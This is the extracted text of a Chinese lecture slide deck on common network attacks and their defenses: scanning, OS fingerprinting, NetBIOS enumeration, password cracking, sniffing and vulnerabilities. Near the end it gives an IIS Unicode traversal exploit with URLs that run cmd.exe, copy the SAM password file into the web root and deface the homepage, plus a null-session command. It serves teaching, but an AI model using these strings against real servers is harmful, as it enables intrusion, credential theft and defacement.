最新常见的网络攻击与防范PPT课件.ppt
《最新常见的网络攻击与防范PPT课件.ppt》由会员分享,可在线阅读,更多相关《最新常见的网络攻击与防范PPT课件.ppt(128页珍藏版)》请在淘文阁 - 分享文档赚钱的网站上搜索。
1、常见的网络攻击与防范常见的网络攻击与防范一、网络攻击步骤网络安全威胁国家基础设施网络安全威胁国家基础设施因特网因特网安全漏洞危害在增大信息对抗的威胁在增加信息对抗的威胁在增加电力电力交通交通通讯通讯控制控制广播广播工业工业金融金融医疗医疗二、预攻击探测Ping工具p操作系统本身的ping工具Ping:PacketInterNetGroper用来判断远程设备可访问性最常用的方法Ping原理:l发送ICMPEcho消息,等待EchoReply消息l可以确定网络和外部主机的状态l可以用来调试网络的软件和硬件l每秒发送一个包,显示响应的输出,计算网络来回的时间l最后显示统计结果丢包率二、预攻击探测关于
2、PinglPing有许多命令行参数,可以改变缺省的行为l可以用来发现一台主机是否activel为什么不能ping成功?没有路由,网关设置?网卡没有配置正确增大timeout值被防火墙阻止l“Pingofdeath”发送特大ping数据包(65535字节)导致机器崩溃许多老的操作系统都受影响二、预攻击探测pWindows平台Pinger、PingSweep、WS_PingProPack图图:Pinger工具工具二、预攻击探测图图:PingSweep二、预攻击探测Ping工具都是通过ICMP协议来发送数据包,那么针对这种扫描的预防措施是:l使用可以检测并记录ICMP扫描的工具l使用入侵检测系统l在
3、防火墙或路由器中设置允许进出自己网络的ICMP分组类型二、预攻击探测2.端口扫描基础端口扫描基础l开放扫描(OpenScanning)需要扫描方通过三次握手过程与目标主机建立完整的TCP连接可靠性高,产生大量审计数据,容易被发现l半开放扫描(Half-OpenScanning)扫描方不需要打开一个完全的TCP连接l秘密扫描(StealthScanning)不包含标准的TCP三次握手协议的任何部分隐蔽性好,但这种扫描使用的数据包在通过网络时容易被丢弃从而产生错误的探测信息二、预攻击探测基本的TCP connect()扫描(开放)Reverse-ident扫描(开放)TCP SYN扫描(半开放)I
4、P ID header aka“dump”IP ID header aka“dump”扫描(半开放)TCP Fin扫描(秘密)TCP XMAS扫描(秘密)TCP ftp proxy扫描(bounce attack)用IP分片进行SYN/FIN扫描(躲开包过滤防火墙)UDP ICMP端口不可达扫描UDP recvfrom扫描二、预攻击探测二、预攻击探测开放扫描开放扫描pTCPconnect()扫描l原理扫描器调用socket的connect()函数发起一个正常的连接l如果端口是打开的,则连接成功l否则,连接失败l优点简单,不需要特殊的权限l缺点服务器可以记录下客户的连接行为,如果同一个客户轮流对
5、每一个端口发起连接,则一定是在扫描二、预攻击探测pReverse-ident扫描lIdent协议(RFC1413)使得可以发现任何一个通过TCP连接的进程的所有者的用户名,即使该进程并没有发起该连接只有在TCP全连接之后才有效TCP端口113l例如可以先连接到80端口,然后通过identd来发现服务器是否在root下运行l建议关闭ident服务,或者在防火墙上禁止,除非是为了审计的目的二、预攻击探测半开放扫描半开放扫描pTCPSYN扫描l原理向目标主机的特定端口发送一个SYN包l如果应答包为RST包,则说明该端口是关闭的l否则,会收到一个SYN|ACK包。于是,发送一个RST,停止建立连接由于
6、连接没有完全建立,所以称为“半开连接扫描”l优点很少有系统会记录这样的行为l缺点在UNIX平台上,需要root权限才可以建立这样的SYN数据包二、预攻击探测pIPIDheaderaka“dump”扫描l由Antirez首先使用,并在Bugtraq上公布l原理:扫描主机通过伪造第三方主机IP地址向目标主机发起SYN扫描,并通过观察其IP序列号的增长规律获取端口的状态l优点l不直接扫描目标主机也不直接和它进行连接,隐蔽性较好l缺点对第三方主机的要求较高二、预攻击探测秘密扫描秘密扫描pTCPFin扫描扫描l原理扫描器发送一个FIN数据包l如果端口关闭的,则远程主机丢弃该包,并送回一个RST包l否则的
7、话,远程主机丢弃该包,不回送变种,组合其他的标记l优点不是TCP建立连接的过程,所以比较隐蔽l缺点与SYN扫描类似,也需要构造专门的数据包在Windows平台无效,总是发送RST包二、预攻击探测pTCPXMAS扫描l原理扫描器发送的TCP包包头设置所有标志位l关闭的端口会响应一个同样设置所有标志位的包l开放的端口则会忽略该包而不作任何响应l优点比较隐蔽l缺点主要用于UNIX/Linux/BSD的TCP/IP的协议栈不适用于Windows系统二、预攻击探测其他扫描其他扫描pTCPftpproxy扫描扫描l原理用PORT命令让ftpserver与目标主机建立连接,而且目标主机的端口可以指定如果端口
8、打开,则可以传输否则,返回425Cantbuilddataconnection:Connectionrefused.Ftp这个缺陷还可以被用来向目标(邮件,新闻)传送匿名信息l优点:这种技术可以用来穿透防火墙l缺点:慢,有些ftpserver禁止这种特性二、预攻击探测pUDPICMP端口不可达扫描端口不可达扫描l利用UDP协议(主机扫描?)l原理开放的UDP端口并不需要送回ACK包,而关闭的端口也不要求送回错误包,所以利用UDP包进行扫描非常困难有些协议栈实现的时候,对于关闭的UDP端口,会送回一个ICMPPortUnreach错误l缺点速度慢,而且UDP包和ICMP包都不是可靠的需要root
9、权限,才能读取ICMPPortUnreach消息l一个应用例子Solaris的rpcbind端口(UDP)位于32770之上,这时可以通过这种技术来探测二、预攻击探测端口扫描对策端口扫描对策p设置防火墙过滤规则,阻止对端口的扫描p例如可以设置检测SYN扫描而忽略FIN扫描p使用入侵检测系统p禁止所有不必要的服务,把自己的暴露程度降到最低pUnix或linux中,在/etc/inetd.conf中注释掉不必要的服务,并在系统启动脚本中禁止其他不必要的服务pWindows中通过Services禁止敏感服务,如IIS二、预攻击探测端口扫描工具图图:NetScanTools二、预攻击探测图图:WinS
10、can二、预攻击探测图图:SuperScan二、预攻击探测图图:Nmap二、预攻击探测图图:X-scan二、预攻击探测3.操作系统的识别l操作系统辨识的动机许多漏洞是系统相关的,而且往往与相应的版本对应从操作系统或者应用系统的具体实现中发掘出来的攻击手段都需要辨识系统操作系统的信息还可以与其他信息结合起来,比如漏洞库,或者社会诈骗(社会工程,socialengineering)l如何辨识一个操作系统一些端口服务的提示信息,例如,telnet、http、ftp等服务的提示信息TCP/IP栈指纹DNS泄漏出OS系统二、预攻击探测图图:winfingerprint二、预攻击探测4.资源扫描与查找资源
11、扫描与查找资源扫描用户扫描网络资源和共享资源,如目标网络计算机名、域名和共享文件等等;而用户扫描则用户扫描目标系统上合法用户的用户名和用户组名。这些扫描都是攻击目标系统的很有价值的信息,而Windows系统,特别是Windows NT/2000在这些方面存在着严重的漏洞,很容易让非法入侵者获取到关于该目标系统的很多有用信息,如共享资源、Netbios名和用户组等。l采用协议:NetBIOS协议、CIFS/SMB协议和空会话l常用工具:NetViewNbtstat和NbtscanLegion和Shed二、预攻击探测pNetView 在命令行中输入在命令行中输入“net view/domain”n
12、et view/domain”命令,可以获取网络上可用命令,可以获取网络上可用的域的域二、预攻击探测在命令行中输入在命令行中输入“netview/domain:domain_name”命令,命令,可以获取某一域中的计算机列表,可以获取某一域中的计算机列表,其中其中domain_name为要列表计算机为要列表计算机的域名。的域名。在在 命命 令令 行行 中中 输输 入入“net viewcomputer_name”命命令令,可可以以获获取取网网络络某某一一计计算算机机的的共共享享资资源源列列表表,其其中中computer_name为计算机名为计算机名。二、预攻击探测pnbtstat和nbtsca
13、nnbtstat(NetBIOSoverTCP/IP)是)是WindowsNT/2000内置的命令内置的命令行工具,利用它可以查询涉及到行工具,利用它可以查询涉及到NetBIOS信息的网络机器。另外,它还信息的网络机器。另外,它还可以用来消除可以用来消除NetBIOS高速缓存器和预加载高速缓存器和预加载LMHOSTS文件等。这个命文件等。这个命令在进行安全检查时非常有用。令在进行安全检查时非常有用。l利用利用nbtstat查看目标查看目标系统系统NetBIOS列表列表二、预攻击探测lNbtstat本身有一些缺陷,如一次只能扫描一台主机等,本身有一些缺陷,如一次只能扫描一台主机等,nbtscan
14、(http:/www.abb.aha.ru/software/nbtscan.html)却可以对一个网段进行扫描却可以对一个网段进行扫描,利用利用nbtscan对网段进行扫描。对网段进行扫描。二、预攻击探测pLegion和和Shed在在NetBIOS扫描中,很重要的一项就是扫描网络中的共享资源,以窃扫描中,很重要的一项就是扫描网络中的共享资源,以窃取资源信息或植入病毒木马。取资源信息或植入病毒木马。Legion和和Shed就是其中的典型。就是其中的典型。lLegion的共享资源扫描可以对一个的共享资源扫描可以对一个IP或网段进行扫描,它还包含或网段进行扫描,它还包含一个共享密码的蛮力攻击工具,
15、如一个共享密码的蛮力攻击工具,如“ShowBFTool”按钮按钮。主要用于主要用于Windows2000以前的操作系统中以前的操作系统中二、预攻击探测lShed是一个速度很快的共享资源扫描工具,它可以显示所是一个速度很快的共享资源扫描工具,它可以显示所有的共享资源,包含隐藏的共享。有的共享资源,包含隐藏的共享。二、预攻击探测p空会话空会话l原理利用WindowsNT/2000对NetBIOS的缺省信赖通过TCP端口139返回主机的大量信息l实例如果通过端口扫描获知TCP端口139已经打开netuse192.168.102.230IPC$/USER:在攻击者和目标主机间建立连接Windows20
16、00还有另一个SMB端口445p预防资源扫描和查找的方法:预防资源扫描和查找的方法:防范NetBIOS扫描的最直接方法就是不允许对TCP/UDP135到139端口的访问,如通过防火墙或路由器的配置等。另外,对单独的主机,可使用NetBIOSoverTCP/IP项失效或注册表配置来实现。Windows2000操作系统还要禁止445端口。二、预攻击探测5.用户和用户组查找用户和用户组查找利用前面介绍的方法,可以很容易获取远程WindowsNT/2000主机的共享资源、NetBIOS名和所处的域信息等。但黑客和非法入侵者更感兴趣的是通过NetBIOS扫描,获取目标主机的用户名列表。如果知道了系统中的
17、用户名(即账号)后,就可以对该账号对应的口令进行猜测攻击(有些口令往往很简单),从而对远程目标主机进行更深入的控制。在WindowsNT/2000的资源工具箱NTRK中提供了众多的工具用于显示远程主机用户名和组信息,如前面介绍的nbtstat和nbtscan,另外还有UsrStat等工具等工具二、预攻击探测pUsrStatUsrStat是一个命令行工具,用于显示一个给定域中的每一个用户是一个命令行工具,用于显示一个给定域中的每一个用户的用户名、全名和最后的登录日期与时间,如图所示,可显示域中计算的用户名、全名和最后的登录日期与时间,如图所示,可显示域中计算机上的用户信息。机上的用户信息。三、漏
18、洞扫描口令破解网络嗅探漏洞攻击综合扫描三、漏洞扫描漏洞扫描是一种最常见的攻击模式,用于探测系统和网络漏洞,如获取系统和应用口令,嗅探敏感信息,利用缓存区溢出直接攻击等。针对某一类型的漏洞,都有专门的攻击攻击。另外,也有一些功能强大综合扫描工具,针对系统进行全面探测和漏洞扫描,如流光等。三、漏洞扫描1.1.口令破解口令破解l系统漏洞系统漏洞利用系统漏洞直接提取口令l暴力穷举暴力穷举完全取决于机器的运算速度l字典破解字典破解大大减少运算的次数,提高成功率三、漏洞扫描图:图:NT/2000密码密码-LC3工具工具三、漏洞扫描p针对口令破解攻击的防范措施针对口令破解攻击的防范措施l安装入侵检测系统,检
19、测口令破解行为l安装安全评估系统,先于入侵者进行模拟口令破解,以便及早发现弱口令并解决l提高安全意识,避免弱口令三、漏洞扫描2.2.网络嗅探网络嗅探网络嗅探是主机的一种工作模式,在这种模式下,主机可以接收到共享式网段在同一条物理通道上传输的所有信息,而不管这些信息的发送方和接受方是谁。此时,如果两台主机进行通信的信息没有加密,只要使用某些网络监听工具,例如,SnifferPro,NetXray,tcpdump,Dsniff等就可以轻而易举地截取包括口令、帐号等敏感信息。l共享信道共享信道广播型以太网l协议不加密协议不加密口令明文传输l混杂模式混杂模式处于这种模式的网卡接受网络中所有数据包三、漏
20、洞扫描p针对口令破解攻击的防范措施针对口令破解攻击的防范措施l安装VPN网关,防止对网间网信道进行嗅探l对内部网络通信采取加密处理l采用交换设备进行网络分段l采取技术手段发现处于混杂模式的主机,发掘“鼹鼠”三、漏洞扫描3.3.漏洞攻击漏洞攻击漏洞即某个程序(包括操作系统)在设计时未考虑周全,当程序遇到一个看似合理,但实际无法处理的问题时,引发的不可预见的错误。漏洞的产生大致有三个原因漏洞的产生大致有三个原因:l编程人员的人为因素,在程序编写过程,为实现不可告人的目的,在程序代码的隐蔽处保留后门。l受编程人员的能力、经验和当时安全技术所限,在程序中难免会有不足之处,轻则影响程序效率,重则导致非授
21、权用户的权限提升。l由于硬件原因,使编程人员无法弥补硬件的漏洞,从而使硬件的问题通过软件表现三、漏洞扫描lVulnerabilityWindowsVulnerabilityScanner是一个系统漏洞维是一个系统漏洞维护工具护工具弱点、漏洞。任何系统都存在漏洞。lexploit针对漏洞开发的应用程序。exploit就是利用一切可以利用的工具、采用一切可以采用的方法、找到一切可以找到的漏洞,并且通过对漏洞资料的分析研究,从而达到获取网站用户资料文档、添加自定义用户、甚至侵入网站获得管理员权限控制整个网站的最终目的。三、漏洞扫描常见漏洞攻击实例常见漏洞攻击实例pUnicodeUnicode漏洞漏洞
22、Unicode漏洞编码在中文Windows NT中为:%c1%1c(代表(0 xc1-0 xc0)*0 x40+0 x1c=0 x5c=/)和%c0%2f(代表(0 xc0-0 xcx)*0 x40+0 x2f=0 x2f=)在英文版中为%c0%af(但%c1%pc、%c0%9v、%c0%qf、%c1%8s等几个编码也可能有效)。通过这几个编码我们可以通过在浏览器上获得有Unicode漏洞的机器的文件控制权。简单的检测办法是在浏览器里面输入:http:/xxx.xxx.xxx.xxx/scripts/.%c1%1c./winnt/system32/cmd.exe?/c+dir,如果显示:Dir
23、ectory of D:Inetpubscripts 01-05-02 02:32a.01-05-02 02:32a.00-12-18 05:50p samples 说明网站存在漏洞,如果不显示该页面,也可能是因为Scripts目录改名了,我们可以试 着输入:http:/xxx.xxx.xxx.xxx/msabc/.%c1%1c./.%c1%1c./.%c1%1c./winnt/system32/cmd.exe?/c+dir,如果显示像上面一样的目录,表明存在漏洞。(例子中xxx.xxx.xxx.xxx为 服务器的IP地址,在DOS窗口用ping命令即可获得)如果还是没有显示该页面,可用上述其
24、他代码:如%c0%af代替%c1%1c试试。三、漏洞扫描qUnicodeUnicode漏洞攻击漏洞攻击 通过Unicode漏洞就可以使攻击者在浏览器执行DOS命令,如:http:/xxx.xxx.xxx.xxx/scripts/./winnt/system32/cmd.exe?/c+dir+c 这条命令将使服务器列出C盘所有目录文件。http:/xxx.xxx.xxx.xxx/scripts/./winnt/system32/cmd.exe?+copy+c:winntrapair|sam._+c:inetpubwwwroot 这将使服务器执行一个复制C盘WinNT目录下sam._到wwwroo
25、t文件夹的命令(sam.保存了经过加密的Windows NT系统密码文件,如果攻击者下载这一文件,可以在本机用工具解得用户密码)。利用 Echo命令即可通过浏览器直接更改网站的主页,如想修改 c:inetpubwwwrootindex.asp,攻击者可以通过在浏览器的地址栏输入:http:/xxx.xxx.xxx.xxx/scripts/./winnt/system32/cmd.exe?/c+echo+Your+Site+Has+Been+Hacked+c:inetpubwwwrootindex.asp 攻击者还可以利用FTP、TFTP上载木马程序及提升管理权限的程序到被攻击的服务器上,也可以
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- 最新 常见 网络 攻击 防范 PPT 课件
限制150内